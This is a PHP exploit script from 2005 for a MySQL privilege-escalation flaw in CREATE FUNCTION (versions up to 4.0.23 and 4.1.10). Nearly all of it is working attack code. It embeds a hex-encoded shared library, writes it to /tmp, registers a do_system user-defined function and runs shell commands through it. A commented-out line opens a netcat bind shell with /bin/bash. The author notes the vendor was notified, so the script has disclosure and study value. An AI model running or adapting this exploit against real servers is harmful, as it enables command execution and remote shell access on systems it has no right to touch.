
  1. <?
  2. /*************************************
  3. ** Mysql CREATE FUNCTION func table arbitrary library injection
  4. **
  5. ** Author: Stefano Di Paola
  6. ** Vulnerable: Mysql <= 4.0.23, 4.1.10 
  7. ** Type of Vulnerability: Local/Remote Privileges Escalation - input validation
  8. ** Tested On : Mandrake 10.1 /Debian Sarge
  9. ** Vendor Status: Notified on March 2005
  10. **
  11. ** Copyright 2005 Stefano Di Paola (stefano.dipaola@wisec.it)
  12. **
  13. ** 
  14. ** Disclaimer:
  15. ** In no event shall the author be liable for any damages 
  16. ** whatsoever arising out of or in connection with the use 
  17. ** or spread of this information. 
  18. ** Any use of this information is at the user's own risk.
  19. **
  20. **
  21. *************************************
  22. */
  23.  
  24.  
  25. // this is the MySql root password.
  26. $pass='useyoupasswordhere';
  27.  
  28. function mysql_create_db($db,$link)
  29. {
  30. $query="CREATE database $db;";
  31. return mysql_query($query, $link) ;
  32.  
  33. }
  34. // the library in little endian hex. (from NGS's Hackproofing_MySql 
  35. // http://www.nextgenss.com/papers/HackproofingMySQL.pdf )
  36. $solib="0x7f454c4601010100000000000000000003000300010000002006000034000000340a00000000 \
  37. 00003400200004002800160015000100000000000000000000000000000094070000940700000500000000 \
  38. 1000000100000094070000941700009417000004010000080100000600000000100000020000009c070000 \
  39. 9c1700009c170000c8000000c8000000060000000400000051e57464000000000000000000000000000000 \
  40. 00000000000600000004000000250000002800000000000000260000000000000000000000000000000000 \
  41. 00000000000022000000270000000000000000000000000000000000000000000000000000000000000000 \
  42. 00000000000000230000001e00000000000000000000000000000000000000000000002000000000000000 \
  43. 00000000000000000000000021000000250000000000000000000000000000002400000000000000000000 \
  44. 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000 \
  45. 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000 \
  46. 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000 \
  47. 000000001c000000000000001f000000000000001d00000000000000000000000000000000000000000000 \
  48. 0000000000b4000000000000000300010000000000f0010000000000000300020000000000700400000000 \
  49. 00000300030000000000100500000000000003000400000000006005000000000000030005000000000090 \
  50. 050000000000000300060000000000c0050000000000000300070000000000d00500000000000003000800 \
  51. 00000000e8050000000000000300090000000000200600000000000003000a000000000074070000000000 \
  52. 0003000b0000000000900700000000000003000c0000000000941700000000000003000d00000000009c17 \
  53. 00000000000003000e0000000000641800000000000003000f00000000006c180000000000000300100000 \
  54. 00000074180000000000000300110000000000781800000000000003001200000000009818000000000000 \
  55. 03001300000000000000000000000000030014000000000000000000000000000300150000000000000000 \
  56. 00000000000300160000000000000000000000000003001700000000000000000000000000030018000000 \
  57. 000000000000000000000300190000000000000000000000000003001a0000000000000000000000000003 \
  58. 001b00010000009c170000000000001100f1ff610000000000000076000000120000002f000000d0050000 \
  59. 00000000120008007900000098180000000000001000f1ff35000000740700000000000012000b003b0000 \
  60. 000000000097000000220000005e000000080700003600000012000a007200000098180000000000001000 \
  61. f1ff0a00000078180000000000001100f1ff850000009c180000000000001000f1ff4a0000000000000000 \
  62. 0000002000000020000000000000000000000020000000005f44594e414d4943005f474c4f42414c5f4f46 \
  63. 465345545f5441424c455f005f5f676d6f6e5f73746172745f5f005f696e6974005f66696e69005f5f6378 \
  64. 615f66696e616c697a65005f4a765f5265676973746572436c617373657300646f5f73797374656d006c69 \
  65. 62632e736f2e36005f6564617461005f5f6273735f7374617274005f656e6400474c4942435f322e312e33 \
  66. 00474c4942435f322e30000000000000000000000000000000000000000000000000000000000000000000 \
  67. 00000000000000000000000000000000000000000000000001000200010001000100030001000100010001 \
  68. 000000000001000200680000001000000000000000731f6909000003008a000000100000001069690d0000 \
  69. 02009600000000000000941700000800000098170000080000002b070000021d00008c1800000621000090 \
  70. 180000062600009418000006270000841800000721000088180000072600005589e583ec08e845000000e8 \
  71. e0000000e85b010000c9c300ffb304000000ffa30800000000000000ffa30c0000006800000000e9e0ffff \
  72. ffffa3100000006808000000e9d0ffffff00000000000000005589e553e8000000005b81c34f120000528b \
  73. 831c00000085c07402ffd0585bc9c39090909090909090909090909090905589e553e8000000005b81c31f \
  74. 1200005180bb200000000075348b931400000085d2752f8b8320ffffff8b1085d2741783c004898320ffff \
  75. ffffd28b8320ffffff8b1085d275e9c68320000000018b5dfcc9c383ec0c8b831cffffff50e846ffffff83 \
  76. c410ebbd89f68dbc27000000005589e553e8000000005b81c3af110000508b83fcffffff85c0740a8b8318 \
  77. 00000085c0750b8b5dfcc9c38db60000000083ec0c8d83fcffffff50e809ffffff83c4108b5dfcc9c39055 \
  78. 89e583ec088b450c8338017409c745fc00000000eb1a83ec0c8b450c8b4008ff30e8fcffffff83c410c745 \
  79. fc000000008b45fcc9c390905589e55653e8000000005b81c32e1100008d83f0ffffff8d70fc8b40fc83f8 \
  80. ff740c83ee04ffd08b0683f8ff75f45b5e5dc390905589e553e8000000005b81c3fb10000050e8c6feffff \
  81. 595bc9c3000000000000941700007018000001000000680000000c000000d00500000d0000007407000004 \
  82. 000000b4000000050000007004000006000000f00100000a000000a00000000b0000001000000003000000 \
  83. 781800000200000010000000140000001100000017000000c0050000110000009005000012000000300000 \
  84. 0013000000080000001600000000000000feffff6f60050000ffffff6f01000000f0ffff6f10050000faff \
  85. ff6f0200000000000000000000000000000000000000000000000000000000000000000000000000000000 \
  86. 000000ffffffff00000000ffffffff00000000000000009c1700000000000000000000fe0500000e060000 \
  87. 000000000000000000000000004743433a2028474e552920332e332e3120284d616e6472616b65204c696e \
  88. 757820392e3220332e332e312d316d646b2900004743433a2028474e552920332e332e3120284d616e6472 \
  89. 616b65204c696e757820392e3220332e332e312d326d646b2900004743433a2028474e552920332e332e31 \
  90. 20284d616e6472616b65204c696e757820392e3220332e332e312d326d646b2900004743433a2028474e55 \
  91. 2920332e332e3120284d616e6472616b65204c696e757820392e3220332e332e312d326d646b2900004743 \
  92. 433a2028474e552920332e332e3120284d616e6472616b65204c696e757820392e3220332e332e312d316d \
  93. 646b2900002e7368737472746162002e68617368002e64796e73796d002e64796e737472002e676e752e76 \
  94. 657273696f6e002e676e752e76657273696f6e5f72002e72656c2e64796e002e72656c2e706c74002e696e \
  95. 6974002e74657874002e66696e69002e65685f6672616d65002e64617461002e64796e616d6963002e6374 \
  96. 6f7273002e64746f7273002e6a6372002e676f74002e627373002e636f6d6d656e74000000000000000000 \
  97. 000000000000000000000000000000000000000000000000000000000000000000000b0000000500000002 \
  98. 000000b4000000b40000003c01000002000000000000000400000004000000110000000b00000002000000 \
  99. f0010000f001000080020000030000001c0000000400000010000000190000000300000002000000700400 \
  100. 0070040000a00000000000000000000000010000000000000021000000ffffff6f02000000100500001005 \
  101. 000050000000020000000000000002000000020000002e000000feffff6f02000000600500006005000030 \
  102. 000000030000000100000004000000000000003d0000000900000002000000900500009005000030000000 \
  103. 02000000000000000400000008000000460000000900000002000000c0050000c005000010000000020000 \
  104. 000900000004000000080000004f0000000100000006000000d0050000d005000017000000000000000000 \
  105. 000004000000000000004a0000000100000006000000e8050000e805000030000000000000000000000004 \
  106. 00000004000000550000000100000006000000200600002006000054010000000000000000000010000000 \
  107. 000000005b000000010000000600000074070000740700001a000000000000000000000004000000000000 \
  108. 00610000000100000002000000900700009007000004000000000000000000000004000000000000006b00 \
  109. 00000100000003000000941700009407000008000000000000000000000004000000000000007100000006 \
  110. 000000030000009c1700009c070000c8000000030000000000000004000000080000007a00000001000000 \
  111. 03000000641800006408000008000000000000000000000004000000000000008100000001000000030000 \
  112. 006c1800006c08000008000000000000000000000004000000000000008800000001000000030000007418 \
  113. 00007408000004000000000000000000000004000000000000008d00000001000000030000007818000078 \
  114. 08000020000000000000000000000004000000040000009200000008000000030000009818000098080000 \
  115. 04000000000000000000000004000000000000009700000001000000000000000000000098080000fa0000 \
  116. 00000000000000000001000000000000000100000003000000000000000000000092090000a00000000000 \
  117. 0000000000000100000000000000";
  118.  
  119. $link=mysql_connect("127.0.0.1","root",$pass);
  120. if (!$link) {
  121. die('Could not connect: ' . mysql_error());
  122. }
  123. echo "Connected successfully as root\n";
  124. echo "creating db for lib\n";
  125. mysql_create_db('my_db',$link) or print ('cannot create my_db db, sorry!');
  126. echo "done....\n";
  127. echo "selecting db for lib\n";
  128. mysql_select_db('my_db') or print ('cannot use my_db db, sorry!');
  129. echo "done....\n";
  130.  
  131. echo "creating blob table for lib\n";
  132. $query="CREATE TABLE blob_tab (blob_col BLOB);";
  133. $result = mysql_query($query, $link) or print("cannot create blob table for lib\n");
  134. echo "done....\n";
  135.  
  136. echo "inserting blob table for lib\n";
  137. $query="INSERT into blob_tab values (CONVERT($solib,CHAR));";
  138. $result = mysql_query($query, $link) or print("cannot insert blob for lib\n");
  139. echo "done....\n";
  140.  
  141. echo "dumping lib in /tmp/libso.so.0...\n";
  142. $query="SELECT blob_col FROM blob_tab INTO DUMPFILE '/tmp/libso.so.0';";
  143. $result = mysql_query($query, $link) or print("cannot dump lib\n");
  144. echo " done....\n";
  145.  
  146. mysql_select_db('mysql') or die ('cannot use mysql db, sorry!');
  147. echo "sending lib....\n";
  148.  
  149. $query="insert into func (name,dl) values ('do_system','/tmp/libso.so.0');";
  150. $result = mysql_query($query, $link);
  151. echo "done....\n";
  152. echo "Creating exit function to restart server\n";
  153.  
  154. $query="create function exit returns integer soname 'libc.so.6';";
  155. $result = mysql_query($query, $link) or print ("cannot create exit, sorry!\n");
  156. echo "done....\n";
  157. echo "Selecting exit function\n";
  158.  
  159. $query="select exit();";
  160. $result = mysql_query($query, $link);
  161. echo "done!\nWaiting for server to restart\n";
  162.  
  163. sleep(1);
  164.  
  165. $link=mysql_connect("127.0.0.1","root",$pass);
  166. if (!$link) {
  167. die('Could not connect: ' . mysql_error());
  168. }
  169. echo "Connected to MySql server again...\n";
  170.  
  171. //$cmd ='/usr/sbin/nc -l -p 8000 -e /bin/bash';
  172. $cmd ='id >/tmp/id';
  173. echo "Sending Command...$cmd\n";
  174. $query="select do_system('$cmd');";
  175. $result = mysql_query($query, $link);
  176. echo "done!\n";
  177. echo "Now use your fav shell and ls /tmp/id -l \n";
  178. mysql_close($link);
  179.  
  180. ?>
  181.  
  182.  
  183.